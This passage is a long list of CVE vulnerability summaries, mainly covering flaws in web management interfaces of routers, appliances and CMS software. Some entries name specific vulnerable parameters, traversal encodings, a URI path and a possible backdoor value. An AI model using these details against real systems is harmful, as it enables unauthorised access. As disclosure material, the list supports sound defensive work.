of the sensor WIDS, (3) the name of the Highwall EndPoint workstation, or other unspecified vectors. [CVE-2006-5515] Cross-site scripting (XSS) vulnerability in lib-history.inc.php in phpAdsNew and phpPgAds before 2.0.8-pr1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to injected data that is stored by a delivery script and displayed by the admin interface. [CVE-2006-5408] Multiple cross-site scripting (XSS) vulnerabilities in the wireless IDS management interface for Highwall Enterprise and Highwall Endpoint 4.0.2.11045 allow remote attackers to inject arbitrary HTML or web script via unspecified vectors. [CVE-2006-4910] The web administration interface (mainApp) to Cisco IDS before 4.1(5c), and IPS 5.0 before 5.0(6p1) and 5.1 before 5.1(2) allows remote attackers to cause a denial of service (unresponsive device) via a crafted SSLv2 Client Hello packet. [CVE-2006-4660] Multiple cross-site scripting (XSS) vulnerabilities in the RSS Feed module in AOL ICQ Toolbar 1.3 for Internet Explorer (toolbaru.dll) allow remote attackers to process arbitrary web script or HTML in the Feeds interface context via the (1) title and (2) description elements within an item element in an RSS feed. [CVE-2006-4523] The web-based management interface in 2Wire, Inc. HomePortal and OfficePortal Series modems and routers allows remote attackers to cause a denial of service (crash) via a CRLF sequence in a GET request. [CVE-2006-3907] Siemens SpeedStream 2624 allows remote attackers to cause a denial of service (device hang) by sending a crafted packet to the web administrative interface. [CVE-2006-3567] Cross-site scripting (XSS) vulnerability in the web administration interface logging feature in Juniper Networks (Redline) DX 5.1.x, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the username login field. [CVE-2006-3291] The web interface on Cisco IOS 12.3(8)JA and 12.3(8)JA1, as used on the Cisco Wireless Access Point and Wireless Bridge, reconfigures itself when it is changed to use the "Local User List Only (Individual Passwords)" setting, which removes all security and password configurations and allows remote attackers to access the system. [CVE-2006-3289] Cross-site scripting (XSS) vulnerability in the login page of the HTTP interface for the Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving a "malicious URL". [CVE-2006-2925] Cross-site scripting (XSS) vulnerability in the web interface in Ingate Firewall before 4.4.1 and SIParator before 4.4.1 allows remote attackers to inject arbitrary web script or HTML, and steal cookies, via unspecified vectors related to "XSS exploits" in administrator functionality. [CVE-2006-2477] Cross-site scripting (XSS) vulnerability in the administrative interface Bitrix Site Manager 4.1.x allows remote attackers to inject arbitrary web script or HTML via unspecified inputs. [CVE-2006-2237] The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter. [CVE-2006-2021] Absolute path traversal vulnerability in recordings/misc/audio.php in the Asterisk Recording Interface (ARI) web interface in Asterisk@Home before 2.8 allows remote attackers to read arbitrary MP3, WAV, and GSM files via a full pathname in the recording parameter. NOTE: this issue can also be used to determine existence of files. [CVE-2006-2020] Asterisk Recording Interface (ARI) in Asterisk@Home before 2.8 stores recordings/includes/main.conf under the web document root with insufficient access control, which allows remote attackers to obtain password information. [CVE-2006-1960] Cross-site scripting (XSS) vulnerability in the appliance web user interface in Cisco CiscoWorks Wireless LAN Solution Engine (WLSE) and WLSE Express before 2.13 allows remote attackers to inject arbitrary web script or HTML, possibly via the displayMsg parameter to archiveApplyDisplay.jsp, aka bug ID CSCsc01095. [CVE-2006-1397] Multiple cross-site scripting (XSS) vulnerabilities in (a) phpAdsNew and (b) phpPgAds before 2.0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) certain parameters to the banner delivery module, which is not properly handled in the administrator interface, or (2) certain parameters to the login form. [CVE-2006-1210] The web interface for IBM Tivoli Micromuse Netcool/NeuSecure 3.0.236 includes the MySQL database username and password in cleartext in body.phtml, which allows remote attackers to gain privileges by reading the source. NOTE: IBM has privately confirmed to CVE that a fix is available for these issues. [CVE-2006-1044] Multiple buffer overflows in LISTSERV 14.3 and 14.4, including LISTSERV Lite and HPO, with the web archive interface enabled, allow remote attackers to execute arbitrary code via unknown attack vectors related to the WA CGI. NOTE: technical details will be released after the grace period has ended on 20060603. [CVE-2006-0993] The web management interface in 3Com TippingPoint SMS Server before 2.2.1.4478 does not restrict access to certain directories, which might allow remote attackers to obtain potentially sensitive information such as configuration settings. [CVE-2006-0571] Multiple cross-site scripting (XSS) vulnerabilities in phpstatus 1.0 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in the administrative interface. [CVE-2006-0507] Multiple cross-site scripting (XSS) vulnerabilities in Easy CMS allow remote attackers to inject arbitrary web script or HTML via (1) unknown attack vectors in the administrative interface and (2) input fields of the contact form. [CVE-2005-4658] Multiple cross-site scripting (XSS) vulnerabilities in ASP-Programmers.com ASPKnowledgebase allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in the administrative interface. [CVE-2005-4583] Unspecified vulnerability in the Management Interface in VMware ESX Server 2.x up to 2.5.x before 24 December 2005 allows "remote code execution in the Web browser" via unspecified attack vectors, probably related to cross-site scripting (XSS). [CVE-2005-4326] The web interface for American Power Conversion (APC) PowerChute Network Shutdown performs all communication in cleartext (base64-encoded), which allows remote attackers to sniff authentication credentials. [CVE-2005-4142] The web interface for subscribing new users in Lyris ListManager 5.0 through 8.8b, in combination with a line wrap feature, allows remote attackers to execute arbitrary list administration commands via LFCR (%0A%0D) sequences in the pw parameter. NOTE: it is not clear whether this is a variant of a CRLF injection vulnerability. [CVE-2005-3921] Cross-site scripting (XSS) vulnerability in Cisco IOS Web Server for IOS 12.0(2a) allows remote attackers to inject arbitrary web script or HTML by (1) packets containing HTML that an administrator views via an HTTP interface to the contents of memory buffers, as demonstrated by the URI /level/15/exec/-/buffers/assigned/dump [CVE-2005-3802] Belkin F5D7232-4 and F5D7230-4 wireless routers with firmware 4.03.03 and 4.05.03, when a legitimate administrator is logged into the web management interface, allow remote attackers to access the management inferface without authentication. [CVE-2005-3620] The management interface for VMware ESX Server 2.0.x before 2.0.2 patch 1, 2.1.x before 2.1.3 patch 1, and 2.x before 2.5.3 patch 2 records passwords in cleartext in URLs that are stored in world-readable web server log files, which allows local users to gain privileges. [CVE-2005-3619] Cross-site scripting (XSS) vulnerability in the management interface for VMware ESX 2.5.x before 2.5.2 upgrade patch 2, 2.1.x before 2.1.2 upgrade patch 6, and 2.0.x before 2.0.1 upgrade patch 6 allows remote attackers to inject arbitrary web script or HTML via messages that are not sanitized when viewing syslog log files. [CVE-2005-3102] The administrative interface in Movable Type allows attackers to upload files with arbitrary extensions under the web root. [CVE-2005-3040] Directory traversal vulnerability in the web interface (ISALogin.dll) for TAC Vista 4.0, and possibly other versions before 4.3, allows remote attackers to read arbitrary files via ".." sequences in the Template parameter. [CVE-2005-2584] The web administration interface in Mentor ADSL-FR4II router running firmware 2.00.0111 does not set a default password, which allows local users to gain access. [CVE-2005-2424] The management interface for Siemens SANTIS 50 running firmware 4.2.8.0, and possibly other products including Ericsson HN294dp and Dynalink RTA300W, allows remote attackers to access the Telnet port without authentication via certain packets to the web interface that cause the interface to freeze. [CVE-2005-2391] Unknown vulnerability in 3Com OfficeConnect Wireless 11g Access Point before 1.03.12 allows remote attackers to obtain sensitive information via the web interface. [CVE-2005-2374] Belkin 54g wireless routers do not properly set an administrative password, which allows remote attackers to gain access via the (1) Telnet or (2) weba dministration interfaces. [CVE-2005-2175] The web interface for Lotus Notes mail automatically processes HTML in an attachment without prompting the user to save or open it, which makes it easier for remote attackers to conduct web-based attacks and steal cookies. [CVE-2005-1284] The addnew script in Argosoft Mail Server Pro 1.8.7.6 allows remote attackers to create arbitrary accounts, even if "Allow Creation of Accounts From the Web Interface" is disabled, via a direct HTTP POST request. [CVE-2005-1282] Multiple cross-site scripting (XSS) vulnerabilities in Argosoft Mail Server Pro 1.8.7.6 allow remote attackers to inject arbitrary web script or HTML via (1) the src parameter in an IMG tag, (2) User settings, or (3) Address book input boxes in the webmail interface. [CVE-2005-0845] Directory traversal vulnerability in the Webmail interface in SurgeMail 2.2g3 allows remote authenticated users to write arbitrary files or directories via a .. (dot dot) in the attach_id parameter. [CVE-2005-0812] The web interface in NotifyLink 3.0 displays passwords in cleartext on the administrative page, which could allow remote attackers or local users to obtain sensitive information. [CVE-2005-0811] The web interface in NotifyLink 3.0 does not properly restrict access to functions that have been disabled in the GUI, which allows remote authenticated users to bypass intended restrictions via a direct request to certain URLs. [CVE-2005-0567] Multiple PHP remote file inclusion vulnerabilities in phpMyAdmin 2.6.1 allow remote attackers to execute arbitrary PHP code by modifying the (1) theme parameter to phpmyadmin.css.php or (2) cfg[Server][extension] parameter to database_interface.lib.php to reference a URL on a remote web server that contains the code. [CVE-2005-0281] Cross-site scripting (XSS) vulnerability in the web interface in Soldner Secret Wars 30830 allows remote attackers to inject arbitrary web script or HTML via a user message, which is not filtered or quoted when the administrator views the server logs. [CVE-2005-0112] The web-based administrative interface for 3Com OfficeConnect Wireless 11g Access Point (AP) 1.00.08, and possibly earlier versions before 1.03.07A, allows remote attackers to bypass authentication and obtain sensitive information by directly accessing the (1) config.bin (2) profile.wlp?PN=ggg or (3) event.logs URLs. [CVE-2005-0012] Format string vulnerability in the a_Interface_msg function in Dillo before 0.8.3-r4 allows remote attackers to execute arbitrary code via format string specifiers in a web page. [CVE-2004-2691] Unspecified vulnerability in 3Com SuperStack 3 4400 switches with firmware version before 3.31 allows remote attackers to cause a denial of service (device reset) via a crafted request to the web management interface. NOTE: the provenance of this information is unknown [CVE-2004-2666] Mantis before 20041016 provides a complete Issue History (Bug History) in the web interface regardless of view_history_threshold, which allows remote attackers to obtain sensitive information (private bug details) by visiting a bug's web page. [CVE-2004-2606] The Web interface in Linksys WRT54G 2.02.7 and BEFSR41 version 3, with the firewall disabled, allows remote attackers to attempt to login to an administration web page, even when the configuration specifies that remote administration is disabled. [CVE-2004-2071] Macallan Mail Solution 2.8.4.6 (Build 260), and possibly earlier versions, allows remote attackers to bypass authentication in the web interface via an HTTP GET request with two slashes ("//") after the server name. [CVE-2004-1981] The web interface for Crystal Reports allows remote attackers to cause a denial of service (disk exhaustion) by repeatedly requesting reports without retrieving the associated image files, which are not cleared from the image file folder. [CVE-2004-1791] The web management interface in Edimax AR-6004 ADSL Routers uses a default administrator name and password, which also appear as the default login text for the management interface, which allows remote attackers to gain access. [CVE-2004-1790] Cross-site scripting (XSS) vulnerability in the web management interface in Edimax AR-6004 ADSL Routers allows remote attackers to inject arbitrary web script or HTML via the URL. [CVE-2004-1789] Cross-site scripting (XSS) vulnerability in the web management interface in ZyWALL 10 4.07 allows remote attackers to inject arbitrary web script or HTML via the rpAuth_1 page. [CVE-2004-1699] SettingsBase.php in Pinnacle ShowCenter 1.51 allows remote attackers to cause a denial of service (web interface errors) via an invalid Skin parameter. [CVE-2004-1591] The web interface for Micronet Wireless Broadband Router SP916BM running firmware before 1.9 08/04/2004 resets the password to the default password when the router is shut off, which could allow remote attackers to gain access. [CVE-2004-1458] The CSAdmin web administration interface for Cisco Secure Access Control Server (ACS) 3.2(2) build 15 allows remote attackers to cause a denial of service (hang) via a flood of TCP connections to port 2002. [CVE-2004-0945] The web management interface for Mitel 3300 Integrated Communications Platform (ICP) before 4.2.2.11 allows remote authenticated users to cause a denial of service (resource exhaustion) via a large number of active sessions, which exceeds ICP's maximum. [CVE-2004-0944] The web management interface for Mitel 3300 Integrated Communications Platform (ICP) before 4.2.2.11 generates easily predictable web session IDs, which allows remote attackers to hijack other sessions via the parentsessionid cookie. [CVE-2004-0764] Mozilla before 1.7, Firefox before 0.9, and Thunderbird before 0.7, allow remote web sites to hijack the user interface via the "chrome" flag and XML User Interface Language (XUL) files. [CVE-2004-0672] Multiple cross-site scripting (XSS) vulnerabilities in the primary and management web interfaces in Netegrity IdentityMinder Web Edition 5.6 allows remote attackers to execute script as other users via (1) script that starts with %00 in the numOfExpressions parameter or (2) the mobjtype parameter. [CVE-2004-0610] The Web administration interface in Microsoft MN-500 Wireless Router allows remote attackers to cause a denial of service (connection refusal) via a large number of open HTTP connections. [CVE-2004-0067] Multiple cross-site scripting (XSS) vulnerabilities in phpGedView before 2.65 allow remote attackers to inject arbitrary HTML or web script via (1) descendancy.php, (2) index.php, (3) individual.php, (4) login.php, (5) relationship.php, (6) source.php, (7) imageview.php, (8) calendar.php, (9) gedrecord.php, (10) login.php, and (11) gdbi_interface.php. NOTE: some aspects of vector 10 were later reported to affect 4.1. [CVE-2004-0014] Multiple buffer overflows in the nd WebDAV interface 0.8.2 and earlier allows remote web servers to execute arbitrary code via certain long strings. [CVE-2003-1427] Directory traversal vulnerability in the web configuration interface in Netgear FM114P 1.4 allows remote attackers to read arbitrary files, such as the netgear.cfg coniguration file, via a hex-encoded (%2e%2e%2f) ../ (dot dot slash) in the port parameter. [CVE-2003-1363] The remote web management interface of Aprelium Technologies Abyss Web Server 1.1.2 and earlier does not log connection attempts to the web management port (9999), which allows remote attackers to mount brute force attacks on the administration console without detection. [CVE-2003-1343] Trend Micro ScanMail for Exchange (SMEX) before 3.81 and before 6.1 might install a back door account in smg_Smxcfg30.exe, which allows remote attackers to gain access to the web management interface via the vcc parameter, possibly "3560121183d3". [CVE-2003-1290] BEA WebLogic Server and WebLogic Express 6.1, 7.0, and 8.1, with RMI and anonymous admin lookup enabled, allows remote attackers to obtain configuration information by accessing MBeanHome via the Java Naming and Directory Interface (JNDI). [CVE-2003-1286] HTTP Proxy in Sambar Server before 6.0 beta 6, when security.ini lacks a 127.0.0.1 proxydeny entry, allows remote attackers to send proxy HTTP requests to the Sambar Server's administrative interface and external web servers, by making a "Connection: keep-alive" request before the proxy requests. [CVE-2003-0943] web-tools in SAP DB before 7.4.03.30 installs several services that are enabled by default, which could allow remote attackers to obtain potentially sensitive information or redirect attacks against internal databases via (1) waecho, (2) Web SQL Interface (websql), or (3) Web Database Manager (webdbm). [CVE-2003-0377] SQL injection vulnerability in the web-based administration interface for iisPROTECT 2.2-r4, and possibly earlier versions, allows remote attackers to insert arbitrary SQL and execute code via certain variables, as demonstrated using the GroupName variable in SiteAdmin.ASP. [CVE-2003-0273] Cross-site scripting (XSS) vulnerability in the web interface for Request Tracker (RT) 1.0 through 1.0.7 allows remote attackers to execute script via message bodies. [CVE-2003-0126] The web interface for SOHO Routefinder 550 firmware 4.63 and earlier, and possibly later versions, has a default "admin" account with a blank password, which could allow attackers on the LAN side to conduct unauthorized activities. [CVE-2003-0125] Buffer overflow in the web interface for SOHO Routefinder 550 before firmware 4.63 allows remote attackers to cause a denial of service (reboot) and execute arbitrary code via a long GET /OPTIONS value. [CVE-2002-2345] Oracle 9i Application Server 9.0.2 stores the web cache administrator interface password in plaintext, which allows remote attackers to gain access. [CVE-2002-2020] Netgear RP114 Cable/DSL Web Safe Router Firmware 3.26 uses a default administrator password and accepts admin logins on the external interface, which allows remote attackers to gain privileges if the password is not changed. [CVE-2002-1673] The web interface for Webmin 0.92 does not properly quote or filter script code in files that are displayed to the interface, which allows local users to execute script and possibly steal cookies by inserting the script into certain files or fields, such as a real user name entry in the passwd file. [CVE-2002-1532] The administrative web interface (STEMWADM) for SurfControl SuperScout Email Filter allows remote attackers to cause a denial of service (resource exhaustion) via a GET request without the terminating /r/n/r/n (CRLF) sequence, which causes the interface to wait for the sequence and blocks other users from accessing it. [CVE-2002-1531] The administrative web interface (STEMWADM) for SurfControl SuperScout Email Filter allows remote attackers to cause a denial of service (crash) via an HTTP request without a Content-Length parameter. [CVE-2002-1530] The administrative web interface (STEMWADM) for SurfControl SuperScout Email Filter allows users to obtain usernames and plaintext passwords via a request to the userlist.asp program, which includes the passwords in a user editing form. [CVE-2002-1529] Cross-site scripting (XSS) vulnerability in msgError.asp for the administrative web interface (STEMWADM) for SurfControl SuperScout Email Filter allows remote attackers to insert arbitrary script or HTML via the Reason parameter. [CVE-2002-1431] Belkin F5D5230-4 4-Port Cable/DSL Gateway Router 1.20.000 modifies the source IP address of internal packets to that of the router's external interface when forwarding a request from an internal host to an internal web server, which allows remote attackers to hide which host is being used to access the web server. [CVE-2002-1312] Buffer overflow in the Web management interface in Linksys BEFW11S4 wireless access point router 2 and BEFSR11, BEFSR41, and BEFSRU31 EtherFast Cable/DSL routers with firmware before 1.43.3 with remote management enabled allows remote attackers to cause a denial of service (router crash) via a long password. [CVE-2002-1195] Cross-site scripting vulnerability (XSS) in the PHP interface for ht://Check 1.1 allows remote web servers to insert arbitrary HTML, including script, via a web page. [CVE-2002-1067] Administrative web interface for IC9 Pocket Print Server Firmware 7.1.30 and 7.1.36f allows remote attackers to cause a denial of service (reboot and reset) via a long password, possibly due to a buffer overflow. [CVE-2002-0891] The web interface (WebUI) of NetScreen ScreenOS before 2.6.1r8, and certain 2.8.x and 3.0.x versions before 3.0.3r1, allows remote attackers to cause a denial of service (crash) via a long user name. [CVE-2002-0870] The original patch for the Cisco Content Service Switch 11000 Series authentication bypass vulnerability (CVE-2001-0622) was incomplete, which still allows remote attackers to gain additional privileges by directly requesting the web management URL instead of navigating through the interface, possibly via a variant of the original attack, as identified by Cisco bug ID CSCdw08549. [CVE-2002-0792] The web management interface for Cisco Content Service Switch (CSS) 11000 switches allows remote attackers to cause a denial of service (soft reset) via (1) an HTTPS POST request, or (2) malformed XML data. [CVE-2002-0769] The web-based configuration interface for the Cisco ATA 186 Analog Telephone Adaptor allows remote attackers to bypass authentication via an HTTP POST request with a single byte, which allows the attackers to (1) obtain the password from the login screen, or (2) reconfigure the adaptor by modifying certain request parameters. [CVE-2002-0670] The web interface for Pingtel xpressa SIP-based voice-over-IP phone 1.2.5 through 1.2.7.4 uses Base64 encoded usernames and passwords for HTTP basic authentication, which allows remote attackers to steal and easily decode the passwords via sniffing. [CVE-2002-0669] The web interface for Pingtel xpressa SIP-based voice-over-IP phone 1.2.5 through 1.2.7.4 allows administrators to cause a denial of service by modifying the SIP_AUTHENTICATE_SCHEME value to force authentication of incoming calls, which does not notify the user when an authentication failure occurs. [CVE-2002-0668] The web interface for Pingtel xpressa SIP-based voice-over-IP phone 1.2.5 through 1.2.7.4 allows authenticated users to modify the Call Forwarding settings and hijack calls. [CVE-2002-0561] The default configuration of the PL/SQL Gateway web administration interface in Oracle 9i Application Server 1.0.2.x uses null authentication, which allows remote attackers to gain privileges and modify DAD settings. [CVE-2002-0393] Buffer overflow in Red-M 1050 (Bluetooth Access Point) management web interface allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long administration password. [CVE-2002-0238] Cross-site scripting vulnerability in web administration interface for NetGear RT314 and RT311 Gateway Routers allows remote attackers to execute arbitrary script on another client via a URL that contains the script. [CVE-2002-0107] Web administration interface in CacheFlow CacheOS 4.0.13 and earlier allows remote attackers to obtain sensitive information via a series of GET requests that do not end in with HTTP/1.0 or another version string, which causes the information to be leaked in the error message. [CVE-2001-1294] Buffer overflow in A-V Tronics Inetserv 3.2.1 and earlier allows remote attackers to cause a denial of service (crash) in the Webmail interface via a long username and password. [CVE-2001-1283] The webmail interface for Ipswitch IMail 7.04 and earlier allows remote authenticated users to cause a denial of service (crash) via a mailbox name that contains a large number of . (dot) or other characters to programs such as (1) readmail.cgi or (2) printmail.cgi, possibly due to a buffer overflow that may allow execution of arbitrary code. [CVE-2001-1252] Network Associates PGP Keyserver 7.0 allows remote attackers to bypass authentication and access the administrative web interface via URLs that directly access cgi-bin instead of keyserver/cgi-bin for the programs (1) console, (2) cs, (3) multi_config and (4) directory. [CVE-2001-1039] The JetAdmin web interface for HP JetDirect does not set a password for the telnet interface when the admin password is changed, which allows remote attackers to gain access to the printer. [CVE-2001-0785] Directory traversal in Webpaging interface in Internet Software Solutions Air Messenger LAN Server (AMLServer) 3.4.2 allows allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-2001-0622] The web management service on Cisco Content Service series 11000 switches (CSS) before WebNS 4.01B29s or WebNS 4.10B17s allows a remote attacker to gain additional privileges by directly requesting the web management URL instead of navigating through the interface. [CVE-2001-0455] Cisco Aironet 340 Series wireless bridge before 8.55 does not properly disable access to the web interface, which allows remote attackers to modify its configuration. [CVE-2001-0270] Marconi ASX-1000 ASX switches allow remote attackers to cause a denial of service in the telnet and web management interfaces via a malformed packet with the SYN-FIN and More Fragments attributes set. [CVE-2001-0133] The web administration interface for Interscan VirusWall 3.6.x and earlier does not use encryption, which could allow remote attackers to obtain the administrator password to sniff the administrator password via the setpasswd.cgi program or other HTTP GET requests that contain base64 encoded usernames and passwords. [CVE-2001-0097] The Web interface for Infinite Interchange 3.6.1 allows remote attackers to cause a denial of service (application crash) via a large POST request. [CVE-2001-0058] The Web interface to Cisco 600 routers running CBOS 2.4.1 and earlier allow remote attackers to cause a denial of service via a URL that does not end in a space character. [CVE-2001-0056] The Cisco Web Management interface in routers running CBOS 2.4.1 and earlier does not log invalid logins, which allows remote attackers to guess passwords without detection. [CVE-2001-0007] Buffer overflow in NetScreen Firewall WebUI allows remote attackers to cause a denial of service via a long URL request to the web administration interface. [CVE-2000-1038] The web administration interface for IBM AS/400 Firewall allows remote attackers to cause a denial of service via an empty GET request. [CVE-2000-0945] The web configuration interface for Catalyst 3500 XL switches allows remote attackers to execute arbitrary commands without authentication when the enable password is not set, via a URL containing the /exec/ directory. [CVE-2000-0758] The web interface for Lyris List Manager 3 and 4 allows list subscribers to obtain administrative access by modifying the value of the list_admin hidden form field. [CVE-2000-0697] The administration interface for the dwhttpd web server in Solaris AnswerBook2 allows interface users to remotely execute commands via shell metacharacters. [CVE-2000-0696] The administration interface for the dwhttpd web server in Solaris AnswerBook2 does not properly authenticate requests to its supporting CGI scripts, which allows remote attackers to add user accounts to the interface by directly calling the admin CGI script. [CVE-2000-0634] The web administration interface for CommuniGate Pro 3.2.5 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-2000-0557] Buffer overflow in the web interface for Cmail 2.4.7 allows remote attackers to execute arbitrary commands via a long GET request. [CVE-2000-0556] Buffer overflow in the web interface for Cmail 2.4.7 allows remote attackers to cause a denial of service by sending a large user name to the user dialog running on port 8002. [CVE-2000-0443] The web interface server in HP Web JetAdmin 5.6 allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-1999-1000] The web administration interface for Cisco Cache Engine allows remote attackers to view performance statistics. [CVE-1999-0887] FTGate web interface server allows remote attackers to read files via a .. (dot dot) attack. [CVE-1999-0884] The Zeus web server administrative interface uses weak encryption for its passwords. [CVE-1999-0842] Symantec Mail-Gear 1.0 web interface server allows remote users to read arbitrary files via a .. (dot dot) attack. [CVE-1999-0571] A router's configuration service or management interface (such as a web server or telnet) is configured to allow connections from arbitrary hosts. [CVE-2013-5100] Cross-site scripting (XSS) vulnerability in the Static Methods since 2007 (div2007) extension before 0.10.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to the t3lib_div::quoteJSvalue function. [CVE-2013-5099] Cross-site scripting (XSS) vulnerability in article.php in Anchor CMS 0.9.1, when comments are enabled, allows remote attackers to inject arbitrary web script or HTML via the Name field. NOTE: some sources have reported that comments.php is vulnerable, but certain functions from comments.php are used by article.php. [CVE-2013-5098] Cross-site scripting (XSS) vulnerability in admin/admin.php in the Download Monitor plugin before 3.3.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the sort parameter, a different vulnerability than CVE-2013-3262. [CVE-2013-5020] Multiple cross-site scripting (XSS) vulnerabilities in bb_admin.php in MiniBB before 3.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) forum_name, (2) forum_group, (3) forum_icon, or (4) forum_desc parameter. NOTE: the whatus vector is already covered by CVE-2008-2066. [CVE-2013-5002] Cross-site scripting (XSS) vulnerability in libraries/schema/Export_Relation_Schema.class.php in phpMyAdmin 3.5.x before 3.5.8.2 and 4.0.x before 4.0.4.2 allows remote authenticated users to inject arbitrary web script or HTML via a crafted pageNumber value to schema_export.php. [CVE-2013-5001] Cross-site scripting (XSS) vulnerability in libraries/plugins/transformations/abstract/TextLinkTransformationsPlugin.class.php in phpMyAdmin 4.0.x before 4.0.4.2 allows remote authenticated users to inject arbitrary web script or HTML via a crafted object name associated with a TextLinkTransformationPlugin link. [CVE-2013-4997] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5.x before 3.5.8.2 allow remote attackers to inject arbitrary web script or HTML via vectors involving a JavaScript event in (1) an anchor identifier to setup/index.php or (2) a chartTitle (aka chart title) value. [CVE-2013-4996] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5.x before 3.5.8.2 and 4.0.x before 4.0.4.2 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) a crafted database name, (2) a crafted user name, (3) a crafted logo URL in the navigation panel, (4) a crafted entry in a certain proxy list, or (5) crafted content in a version.json file. [CVE-2013-4995] Cross-site scripting (XSS) vulnerability in phpMyAdmin 3.5.x before 3.5.8.2 and 4.0.x before 4.0.4.2 allows remote authenticated users to inject arbitrary web script or HTML via a crafted SQL query that is not properly handled during the display of row information. [CVE-2013-4954] Multiple cross-site scripting (XSS) vulnerabilities in wp-login.php in the Genetech Solutions Pie-Register plugin before 1.31 for WordPress, when "Allow New Registrations to set their own Password" is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) pass1 or (2) pass2 parameter in a register action. NOTE: some of these details are obtained from third party information. [CVE-2013-4951] Multiple cross-site scripting (XSS) vulnerabilities in Mintboard 0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) pass parameter in views/login.php or (3) name or (4) pass parameter in views/signup.php. [CVE-2013-4950] Cross-site scripting (XSS) vulnerability in view.php in Machform 2 allows remote attackers to inject arbitrary web script or HTML via the element_2 parameter. [CVE-2013-4946] Multiple cross-site scripting (XSS) vulnerabilities in BMC Service Desk Express (SDE) 10.2.1.95 allow remote attackers to inject arbitrary web script or HTML via the (1) SelTab parameter to QV_admin.aspx, the (2) CallBack parameter to QV_grid.aspx, or the (3) HelpPage parameter to commonhelp.aspx. [CVE-2013-4944] Cross-site scripting (XSS) vulnerability in the BuddyPress Extended Friendship Request plugin before 1.0.2 for WordPress, when the "Friend Connections" component is enabled, allows remote attackers to inject arbitrary web script or HTML via the friendship_request_message parameter to wp-admin/admin-ajax.php. NOTE: some of these details are obtained from third party information. [CVE-2013-4942] Cross-site scripting (XSS) vulnerability in flashuploader.swf in the Uploader component in Yahoo! YUI 3.5.0 through 3.9.1, as used in Moodle through 2.1.10, 2.2.x before 2.2.11, 2.3.x before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.1, and other products, allows remote attackers to inject arbitrary web script or HTML via a crafted string in a URL. [CVE-2013-4941] Cross-site scripting (XSS) vulnerability in uploader.swf in the Uploader component in Yahoo! YUI 3.2.0 through 3.9.1, as used in Moodle through 2.1.10, 2.2.x before 2.2.11, 2.3.x before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.1, and other products, allows remote attackers to inject arbitrary web script or HTML via a crafted string in a URL. [CVE-2013-4940] Cross-site scripting (XSS) vulnerability in io.swf in the IO Utility component in Yahoo! YUI 3.10.2, as used in Moodle through 2.1.10, 2.2.x before 2.2.11, 2.3.x before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.1, and other products, allows remote attackers to inject arbitrary web script or HTML via a crafted string in a URL. NOTE: this vulnerability exists because of a CVE-2013-4939 regression. [CVE-2013-4939] Cross-site scripting (XSS) vulnerability in io.swf in the IO Utility component in Yahoo! YUI 3.0.0 through 3.9.1, as used in Moodle through 2.1.10, 2.2.x before 2.2.11, 2.3.x before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.1, and other products, allows remote attackers to inject arbitrary web script or HTML via a crafted string in a URL. [CVE-2013-4912] Open redirect vulnerability in Siemens WinCC (TIA Portal) 11 and 12 before 12 SP1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks by leveraging improper configuration of SIMATIC HMI panels by the WinCC product. [CVE-2013-4890] The DMCRUIS/0.1 web server on the Samsung PS50C7700 TV allows remote attackers to cause a denial of service (daemon crash) via a long URI to TCP port 5600. [CVE-2013-4883] Multiple cross-site scripting (XSS) vulnerabilities in McAfee ePolicy Orchestrator 4.6.6 and earlier, and the ePO Extension for the McAfee Agent (MA) 4.5 through 4.6, allow remote attackers to inject arbitrary web script or HTML via the (1) instanceId parameter core/loadDisplayType.do [CVE-2013-4872] Google Glass before XE6 does not properly restrict the processing of QR codes, which allows physically proximate attackers to modify the configuration or redirect users to arbitrary web sites via a crafted symbol, as demonstrated by selecting a Wi-Fi access point in order to conduct a man-in-the-middle attack. [CVE-2013-4802] Cross-site scripting (XSS) vulnerability in HP Application Lifecycle Management (ALM) Quality Center before 11.51 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka ZDI-CAN-1565. [CVE-2013-4779] Cross-site scripting (XSS) vulnerability in core/handleTw.php on the Siemens Enterprise OpenScape Branch appliance and OpenScape Session Border Controller (SBC) before 2 R0.32.0, and 7 before 7 R1.7.0, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-4759] Multiple cross-site scripting (XSS) vulnerabilities in the Magnolia Form module 1.x before 1.4.7 and 2.x before 2.0.2 for Magnolia CMS allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) fullname, or (3) email parameter to magnoliaPublic/demo-project/members-area/registration.html. [CVE-2013-4749] Cross-site scripting (XSS) vulnerability in the UserTask Center, Messaging (sys_messages) extension 1.1.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-4747] Cross-site scripting (XSS) vulnerability in the Accessible browse results for indexed search (accessible_is_browse_results) extension 1.2.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-4746] Cross-site scripting (XSS) vulnerability in the My quiz and poll (myquizpoll) extension before 2.0.6 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-4744] Cross-site scripting (XSS) vulnerability in the 